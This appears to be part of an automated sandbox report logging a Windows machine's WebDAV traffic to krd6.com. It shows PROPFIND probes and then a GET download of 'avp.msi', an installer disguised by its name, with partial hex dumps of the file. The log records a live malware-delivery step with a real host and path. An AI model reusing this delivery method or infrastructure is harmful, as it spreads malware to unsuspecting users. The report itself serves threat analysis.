                                                                  Apr 17, 2024 16:51:37.695229053 CEST174OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 68 61 72 65 2f 44 65 73 6b 74 6f 70 2e 69 6e 69 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66
                                                                  Data Ascii: PROPFIND /share/Desktop.ini HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: krd6.com
                                                                  Apr 17, 2024 16:51:38.052789927 CEST588INHTTP/1.1 404 Not Found
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 392
                                                                  Date: Wed, 17 Apr 2024 14:51:37 GMT
                                                                  Connection: close
                                                                  Server: WsgiDAV/4.3.0 Cheroot/10.0.0 Python/3.10.12
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 27 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 27 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 3c 70 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3a 20 2f 44 65 73 6b 74 6f 70 2e 69 6e 69 3c 2f 70 3e 0a 3c 68 72 2f 3e 0a 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 61 72 31 30 2f 77 73 67 69 64 61 76 2f 27 3e 57 73 67 69 44 41 56 2f 34 2e 33 2e 30 3c 2f 61 3e 20 2d 20 32 30 32 34 2d 30 34 2d 31 37 20 31 36 3a 35 31 3a 33 37 2e 39 30 31 31 33 31 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'><html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title></head><body> <h1>404 Not Found</h1> <p>404 Not Found: /Desktop.ini</p><hr/><a href='https://github.com/mar10/wsgidav/'>WsgiDAV/4.3.0</a> - 2024-04-17 16:51:37.901131</body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.64971987.249.49.20680
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 17, 2024 16:51:38.301042080 CEST174OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 68 61 72 65 2f 41 75 74 6f 52 75 6e 2e 69 6e 66 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66
                                                                  Data Ascii: PROPFIND /share/AutoRun.inf HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: krd6.com
                                                                  Apr 17, 2024 16:51:38.663029909 CEST588INHTTP/1.1 404 Not Found
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 392
                                                                  Date: Wed, 17 Apr 2024 14:51:38 GMT
                                                                  Connection: close
                                                                  Server: WsgiDAV/4.3.0 Cheroot/10.0.0 Python/3.10.12
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 27 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 27 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 3c 70 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3a 20 2f 41 75 74 6f 52 75 6e 2e 69 6e 66 3c 2f 70 3e 0a 3c 68 72 2f 3e 0a 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 61 72 31 30 2f 77 73 67 69 64 61 76 2f 27 3e 57 73 67 69 44 41 56 2f 34 2e 33 2e 30 3c 2f 61 3e 20 2d 20 32 30 32 34 2d 30 34 2d 31 37 20 31 36 3a 35 31 3a 33 38 2e 35 31 33 37 32 39 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'><html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title></head><body> <h1>404 Not Found</h1> <p>404 Not Found: /AutoRun.inf</p><hr/><a href='https://github.com/mar10/wsgidav/'>WsgiDAV/4.3.0</a> - 2024-04-17 16:51:38.513729</body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.64972087.249.49.20680
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 17, 2024 16:51:38.408371925 CEST170OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 68 61 72 65 2f 61 76 70 2e 6d 73 69 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65
                                                                  Data Ascii: PROPFIND /share/avp.msi HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: krd6.com
                                                                  Apr 17, 2024 16:51:38.761814117 CEST1103INHTTP/1.1 207 Multi-Status
                                                                  Content-Type: application/xml; charset=utf-8
                                                                  Date: Wed, 17 Apr 2024 14:51:38 GMT
                                                                  Content-Length: 898
                                                                  Connection: close
                                                                  Server: WsgiDAV/4.3.0 Cheroot/10.0.0 Python/3.10.12
                                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 0a 3c 6e 73 30 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 6e 73 30 3d 22 44 41 56 3a 22 3e 3c 6e 73 30 3a 72 65 73 70 6f 6e 73 65 3e 3c 6e 73 30 3a 68 72 65 66 3e 2f 73 68 61 72 65 2f 61 76 70 2e 6d 73 69 3c 2f 6e 73 30 3a 68 72 65 66 3e 3c 6e 73 30 3a 70 72 6f 70 73 74 61 74 3e 3c 6e 73 30 3a 70 72 6f 70 3e 3c 6e 73 30 3a 72 65 73 6f 75 72 63 65 74 79 70 65 20 2f 3e 3c 6e 73 30 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 34 2d 30 34 2d 31 36 54 31 36 3a 33 35 3a 35 38 5a 3c 2f 6e 73 30 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 6e 73 30 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 3e 31 34 32 37 39 36 38 3c 2f 6e 73 30 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 3e 3c 6e 73 30 3a 67 65 74 63 6f 6e 74 65 6e 74 74 79 70 65 3e 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 69 3c 2f 6e 73 30 3a 67 65 74 63 6f 6e 74 65 6e 74 74 79 70 65 3e 3c 6e 73 30 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 54 75 65 2c 20 31 36 20 41 70 72 20 32 30 32 34 20 31 36 3a 33 34 3a 31 32 20 47 4d 54 3c 2f 6e 73 30 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 3c 6e 73 30 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 61 76 70 2e 6d 73 69 3c 2f 6e 73 30 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 6e 73 30 3a 67 65 74 65 74 61 67 3e 32 35 38 30 35 35 2d 31 37 31 33 32 38 35 32 35 32 2d 31 34 32 37 39 36 38 3c 2f 6e 73 30 3a 67 65 74 65 74 61 67 3e 3c 6e 73 30 3a 6c 6f 63 6b 64 69 73 63 6f 76 65 72 79 20 2f 3e 3c 6e 73 30 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 65 78 63 6c 75 73 69 76 65 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 6e 73 30 3a 77 72 69 74 65 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 73 68 61 72 65 64 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 6e 73 30 3a 77 72 69 74 65 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 2f 6e 73 30 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 2f 6e 73 30 3a 70 72 6f 70 3e 3c 6e 73 30 3a 73 74 61 74 75 73 3e 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 3c 2f 6e 73 30 3a 73 74 61 74 75 73 3e 3c 2f 6e 73 30 3a 70 72 6f 70 73 74 61 74 3e 3c 2f 6e 73 30 3a 72 65 73 70 6f 6e 73 65 3e 3c 2f 6e 73 30 3a 6d 75 6c 74 69 73 74 61 74 75 73 3e
                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8" ?><ns0:multistatus xmlns:ns0="DAV:"><ns0:response><ns0:href>/share/avp.msi</ns0:href><ns0:propstat><ns0:prop><ns0:resourcetype /><ns0:creationdate>2024-04-16T16:35:58Z</ns0:creationdate><ns0:getcontentlength>1427968</ns0:getcontentlength><ns0:getcontenttype>application/x-msi</ns0:getcontenttype><ns0:getlastmodified>Tue, 16 Apr 2024 16:34:12 GMT</ns0:getlastmodified><ns0:displayname>avp.msi</ns0:displayname><ns0:getetag>258055-1713285252-1427968</ns0:getetag><ns0:lockdiscovery /><ns0:supportedlock><ns0:lockentry><ns0:lockscope><ns0:exclusive /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry><ns0:lockentry><ns0:lockscope><ns0:shared /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry></ns0:supportedlock></ns0:prop><ns0:status>HTTP/1.1 200 OK</ns0:status></ns0:propstat></ns0:response></ns0:multistatus>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.64972187.249.49.20680
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 17, 2024 16:51:39.017600060 CEST170OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 68 61 72 65 2f 61 76 70 2e 6d 73 69 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65
                                                                  Data Ascii: PROPFIND /share/avp.msi HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: krd6.com
                                                                  Apr 17, 2024 16:51:39.378653049 CEST1103INHTTP/1.1 207 Multi-Status
                                                                  Content-Type: application/xml; charset=utf-8
                                                                  Date: Wed, 17 Apr 2024 14:51:39 GMT
                                                                  Content-Length: 898
                                                                  Connection: close
                                                                  Server: WsgiDAV/4.3.0 Cheroot/10.0.0 Python/3.10.12
                                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 0a 3c 6e 73 30 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 6e 73 30 3d 22 44 41 56 3a 22 3e 3c 6e 73 30 3a 72 65 73 70 6f 6e 73 65 3e 3c 6e 73 30 3a 68 72 65 66 3e 2f 73 68 61 72 65 2f 61 76 70 2e 6d 73 69 3c 2f 6e 73 30 3a 68 72 65 66 3e 3c 6e 73 30 3a 70 72 6f 70 73 74 61 74 3e 3c 6e 73 30 3a 70 72 6f 70 3e 3c 6e 73 30 3a 72 65 73 6f 75 72 63 65 74 79 70 65 20 2f 3e 3c 6e 73 30 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 34 2d 30 34 2d 31 36 54 31 36 3a 33 35 3a 35 38 5a 3c 2f 6e 73 30 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 6e 73 30 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 3e 31 34 32 37 39 36 38 3c 2f 6e 73 30 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 3e 3c 6e 73 30 3a 67 65 74 63 6f 6e 74 65 6e 74 74 79 70 65 3e 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 69 3c 2f 6e 73 30 3a 67 65 74 63 6f 6e 74 65 6e 74 74 79 70 65 3e 3c 6e 73 30 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 54 75 65 2c 20 31 36 20 41 70 72 20 32 30 32 34 20 31 36 3a 33 34 3a 31 32 20 47 4d 54 3c 2f 6e 73 30 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 3c 6e 73 30 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 61 76 70 2e 6d 73 69 3c 2f 6e 73 30 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 6e 73 30 3a 67 65 74 65 74 61 67 3e 32 35 38 30 35 35 2d 31 37 31 33 32 38 35 32 35 32 2d 31 34 32 37 39 36 38 3c 2f 6e 73 30 3a 67 65 74 65 74 61 67 3e 3c 6e 73 30 3a 6c 6f 63 6b 64 69 73 63 6f 76 65 72 79 20 2f 3e 3c 6e 73 30 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 65 78 63 6c 75 73 69 76 65 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 6e 73 30 3a 77 72 69 74 65 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 73 68 61 72 65 64 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 6e 73 30 3a 77 72 69 74 65 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 2f 6e 73 30 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 2f 6e 73 30 3a 70 72 6f 70 3e 3c 6e 73 30 3a 73 74 61 74 75 73 3e 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 3c 2f 6e 73 30 3a 73 74 61 74 75 73 3e 3c 2f 6e 73 30 3a 70 72 6f 70 73 74 61 74 3e 3c 2f 6e 73 30 3a 72 65 73 70 6f 6e 73 65 3e 3c 2f 6e 73 30 3a 6d 75 6c 74 69 73 74 61 74 75 73 3e
                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8" ?><ns0:multistatus xmlns:ns0="DAV:"><ns0:response><ns0:href>/share/avp.msi</ns0:href><ns0:propstat><ns0:prop><ns0:resourcetype /><ns0:creationdate>2024-04-16T16:35:58Z</ns0:creationdate><ns0:getcontentlength>1427968</ns0:getcontentlength><ns0:getcontenttype>application/x-msi</ns0:getcontenttype><ns0:getlastmodified>Tue, 16 Apr 2024 16:34:12 GMT</ns0:getlastmodified><ns0:displayname>avp.msi</ns0:displayname><ns0:getetag>258055-1713285252-1427968</ns0:getetag><ns0:lockdiscovery /><ns0:supportedlock><ns0:lockentry><ns0:lockscope><ns0:exclusive /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry><ns0:lockentry><ns0:lockscope><ns0:shared /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry></ns0:supportedlock></ns0:prop><ns0:status>HTTP/1.1 200 OK</ns0:status></ns0:propstat></ns0:response></ns0:multistatus>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.64972287.249.49.20680
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 17, 2024 16:51:39.624150038 CEST179OUTGET /share/avp.msi HTTP/1.1
                                                                  Cache-Control: no-cache
                                                                  Connection: Keep-Alive
                                                                  Pragma: no-cache
                                                                  User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
                                                                  translate: f
                                                                  Host: krd6.com
                                                                  Apr 17, 2024 16:51:39.972574949 CEST1289INHTTP/1.1 200 OK
                                                                  Content-Length: 1427968
                                                                  Last-Modified: Tue, 16 Apr 2024 16:34:12 GMT
                                                                  Content-Type: application/x-msi
                                                                  Date: Wed, 17 Apr 2024 14:51:39 GMT
                                                                  ETag: "258055-1713285252-1427968"
                                                                  Accept-Ranges: bytes
                                                                  Connection: close
                                                                  Server: WsgiDAV/4.3.0 Cheroot/10.0.0 Python/3.10.12
                                                                  Data Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 03 00 fe ff 09 00 06 00 00 00 00 00 00 00 00 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 03 00 00 00 05 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 44 00 00 00 ce 00 00 00 60 01 00 00 c1 01 00 00 15 02 00 00 16 02 00 00 17 02 00 00 18 02 00 00 19 02 00 00 1a 02 00 00 1b 02 00 00 08 00 00 00 2f 06 00 00 30 06 00 00 31 06 00 00 32 06 00 00 33 06 00 00 34 06 00 00 35 06 00 00 36 06 00 00 37 06 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd ff ff ff 02 00 00 00 07 00 00 00 3b 00 00 00 05 00 00 00 06 00 00 00 21 00 00 00 33 00 00 00 fd ff ff ff 0a 00 00 00 0b 00 00 00 0c 00 00 00 0d 00 00 00 0e 00 00 00 0f 00 00 00 10 00 00 00 11 00 00 00 12 00 00 00 13 00 00 00 14 00 00 00 15 00 00 00 16 00 00 00 17 00 00 00 18 00 00 00 19 00 00 00 1a 00 00 00 1b 00 00 00 1c 00 00 00 1d 00 00 00 1e 00 00 00 1f 00 00 00 20 00 00 00 2b 00 00 00 22 00 00 00 23 00 00 00 24 00 00 00 25 00 00 00 26 00 00 00 27 00 00 00 28 00 00 00 29 00 00 00 2a 00 00 00 31 00 00 00 2c 00 00 00 2d 00 00 00 2e 00 00 00 2f 00 00 00 30 00 00 00 34 00 00 00 32 00 00 00 3a 00 00 00 3f 00 00 00 35 00 00 00 36 00 00 00 37 00 00 00 38 00 00 00 39 00 00 00 3e 00 00 00 3c 00 00 00 b8 01 00 00 3d 00 00 00 a1 01 00 00 8d 05 00 00 40 00 00 00 41 00 00 00 42 00 00 00 43 00 00 00 8b 05 00 00 fd ff ff ff 46 00 00 00 47 00 00 00 48 00 00 00 49 00 00 00 4a 00 00 00 4b 00 00 00 4c 00 00 00 4d 00 00 00 4e 00 00 00 4f 00 00 00 50 00 00 00 51 00 00 00 52 00 00 00 53 00 00 00 54 00 00 00 55 00 00 00 56 00 00 00 57 00 00 00 58 00 00 00 59 00 00 00 5a 00 00 00 5b 00 00 00 5c 00 00 00 5d 00 00 00 5e 00 00 00 5f 00 00 00 60 00 00 00 61 00 00 00 62 00 00 00 63 00 00 00 64 00 00 00 65 00 00 00 66 00 00 00 67 00 00 00 68 00 00 00 69 00 00 00 6a 00 00 00 6b 00 00 00 6c 00 00 00 6d 00 00 00 6e 00 00 00 6f 00 00 00 70 00 00 00 71 00 00 00 72 00 00 00 73 00 00 00 74 00 00 00 75 00 00 00 76 00 00 00 77 00 00 00 78 00 00 00 79 00 00 00 7a 00 00 00
                                                                  Data Ascii: >D`/01234567;!3 +"#$%&'()*1,-./042:?56789><=@ABCFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz
                                                                  Apr 17, 2024 16:51:39.972592115 CEST1289INData Raw: 7b 00 00 00 7c 00 00 00 7d 00 00 00 7e 00 00 00 7f 00 00 00 80 00 00 00 52 00 6f 00 6f 00 74 00 20 00 45 00 6e 00 74 00 72 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii: {|}~Root EntryF07SummaryInformation(
                                                                  Apr 17, 2024 16:51:39.972603083 CEST1289INData Raw: 00 00 00 3e 00 00 00 3f 00 00 00 40 00 00 00 41 00 00 00 42 00 00 00 43 00 00 00 44 00 00 00 45 00 00 00 46 00 00 00 47 00 00 00 48 00 00 00 49 00 00 00 4a 00 00 00 4b 00 00 00 4c 00 00 00 4d 00 00 00 4e 00 00 00 4f 00 00 00 50 00 00 00 51 00 00
                                                                  Data Ascii: >?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`adfghijklmnopwrstuvxy
                                                                  Apr 17, 2024 16:51:39.972635031 CEST1289INData Raw: 1d 01 48 ad 04 a1 04 81 02 85 00 99 26 9d 26 ad 02 a5 00 9d 48 ad ff 9d 02 95 26 ad 02 85 26 ad 48 ad 20 ad 20 ad 04 8d 04 91 04 91 ff 9d 02 95 20 9d ff 9d ff 9d 48 ad 00 9d 02 95 48 ad 00 9d 00 9d 48 ad 00 9d 02 95 48 ad 20 8d 02 85 04 91 02 95
                                                                  Data Ascii: H&&H&&H HHHH HHHHH&HHH@ HH222H222H&&@HHHH222HH22H22
                                                                  Apr 17, 2024 16:51:39.972894907 CEST1289INData Raw: 00 42 06 00 00 43 06 00 00 44 06 00 00 45 06 00 00 46 06 00 00 47 06 00 00 48 06 00 00 49 06 00 00 4a 06 00 00 4b 06 00 00 4c 06 00 00 4d 06 00 00 4e 06 00 00 4f 06 00 00 50 06 00 00 51 06 00 00 52 06 00 00 53 06 00 00 54 06 00 00 55 06 00 00 56
                                                                  Data Ascii: BCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
                                                                  Apr 17, 2024 16:51:39.972908020 CEST1289INData Raw: 6f 6e 74 20 75 73 65 64 2e 20 54 68 69 73 20 73 69 7a 65 20 69 73 20 67 69 76 65 6e 20 69 6e 20 6f 75 72 20 75 6e 69 74 73 20 28 31 2f 31 32 20 6f 66 20 74 68 65 20 73 79 73 74 65 6d 20 66 6f 6e 74 20 68 65 69 67 68 74 29 2e 20 41 73 73 75 6d 69
                                                                  Data Ascii: ont used. This size is given in our units (1/12 of the system font height). Assuming that the system font is set to 12 point size, this is equivalent to the point size.Description of columnPrimary key, non-localized token, foreign key to File
                                                                  Apr 17, 2024 16:51:39.973124027 CEST1289INData Raw: 70 65 72 20 6c 65 66 74 20 63 6f 72 6e 65 72 20 6f 66 20 74 68 65 20 62 6f 75 6e 64 69 6e 67 20 72 65 63 74 61 6e 67 6c 65 20 6f 66 20 74 68 65 20 63 6f 6e 74 72 6f 6c 2e 43 6f 6e 74 72 6f 6c 5f 46 69 72 73 74 44 65 66 69 6e 65 73 20 74 68 65 20
                                                                  Data Ascii: per left corner of the bounding rectangle of the control.Control_FirstDefines the control that has the focus when the dialog is created.ErrorMessageTemplateError formatting template, obtained from user ed. or localizers.FeatureDirectory_Direct
                                                                  Apr 17, 2024 16:51:39.973134995 CEST1289INData Raw: 74 68 65 20 73 74 72 69 6e 67 20 69 6e 20 74 68 65 20 52 47 42 20 66 6f 72 6d 61 74 20 28 52 65 64 2c 20 47 72 65 65 6e 2c 20 42 6c 75 65 20 65 61 63 68 20 30 2d 32 35 35 2c 20 52 47 42 20 3d 20 52 20 2b 20 32 35 36 2a 47 20 2b 20 32 35 36 5e 32
                                                                  Data Ascii: the string in the RGB format (Red, Green, Blue each 0-255, RGB = R + 256*G + 256^2*B).Required key of a Directory table record. This is actually a property name whose value contains the actual path, set either by the AppSearch action or with t
                                                                  Apr 17, 2024 16:51:39.973311901 CEST1289INData Raw: 73 65 64 20 74 6f 20 73 65 74 20 74 68 65 20 69 6e 69 74 69 61 6c 20 74 65 78 74 20 63 6f 6e 74 61 69 6e 65 64 20 77 69 74 68 69 6e 20 61 20 63 6f 6e 74 72 6f 6c 20 28 69 66 20 61 70 70 72 6f 70 72 69 61 74 65 29 2e 43 6f 6e 74 72 6f 6c 5f 4e 65
                                                                  Data Ascii: sed to set the initial text contained within a control (if appropriate).Control_NextThe name of an other control on the same dialog. This link defines the tab order of the controls. The links have to form one or more cycles!HelpThe help string
